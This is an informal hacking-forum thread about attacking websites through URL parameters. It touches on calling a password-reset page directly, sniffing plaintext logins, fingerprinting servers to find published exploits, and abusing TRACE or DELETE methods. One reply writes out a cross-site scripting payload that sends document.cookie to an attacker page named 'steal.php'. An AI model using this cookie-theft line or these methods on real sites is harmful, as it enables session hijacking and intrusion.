URL Hacking

No explicit questions like "how do I hack xxx.com" please!
Post Reply
User avatar
maboroshi
Dr. Mab
Dr. Mab
Posts: 1602
Joined: 28 Aug 2005, 16:00
15

URL Hacking

Post by maboroshi »

are there ways to hack web sites by adding tags to a url

say I have a form with a post or get value lets say its get the form has a field known as email which sends a password to that email I look at the code to find out where its page is redirected to say for example sendpasswrd.php

so instead of submitting the form I execute the command in the url

http://www.mysite.com/sendpasswrd.php?e ... yemail.com

I have heard of code being executed in this way any ideas

I am just curious for the sake of learning

User avatar
maboroshi
Dr. Mab
Dr. Mab
Posts: 1602
Joined: 28 Aug 2005, 16:00
15

RE:

Post by maboroshi »

Well I looked it up its possible to break into computers using UTF Illegal characters and exploiting vulnerabilities in these servers

Anyway my question is answered

Maboroshi

User avatar
DNR
Digital Mercenary
Digital Mercenary
Posts: 6114
Joined: 24 Feb 2006, 17:00
14
Location: Michigan USA
Contact:

hacking URLs

Post by DNR »

Tripod.com used to be real bad with coding for its logins. If you ran a packet sniffer on yourself while you logged in, you could catch your user/pwd in plain text. Angelfire used to submit new user NFO in plain text too. Running a packetsniffer could help you understand the process of login.

When I find a webserver I find its NOS/OS (network operating system), its version, and if it has been patched/updated. Old version of operating systems mean that there are plenty of published exploits for that version of NOS/OS. Searching Packet Storm, Altavista, antionline, whatever, will get you the latest 'sploit. I use copernic for searching zero day published code or hacks..

DNR

User avatar
Gogeta70
^_^
^_^
Posts: 3247
Joined: 25 Jun 2005, 16:00
15

Post by Gogeta70 »

Maboroshi, there's a technique some people still use today. All you have to do is make a php page that accept's the "$_GET[];" var. so a url would look like this:

Code: Select all

http://url.com/steal.php?cookie=<sc ript>document.cookie()</scri pt>
which actually would work. I've even done it my self.
¯\_(ツ)_/¯ It works on my machine...

User avatar
bad_brain
Site Owner
Site Owner
Posts: 11532
Joined: 06 Apr 2005, 16:00
15
Location: The zone.
Contact:

Post by bad_brain »

right gogeta, XSS still works for many sites, it has been (unsuccessfully) tried on this board too a couple of times.
not only the GET-method is interesting, if the server is badly configured it may also allow TRACE and even DELETE....
:wink:

Post Reply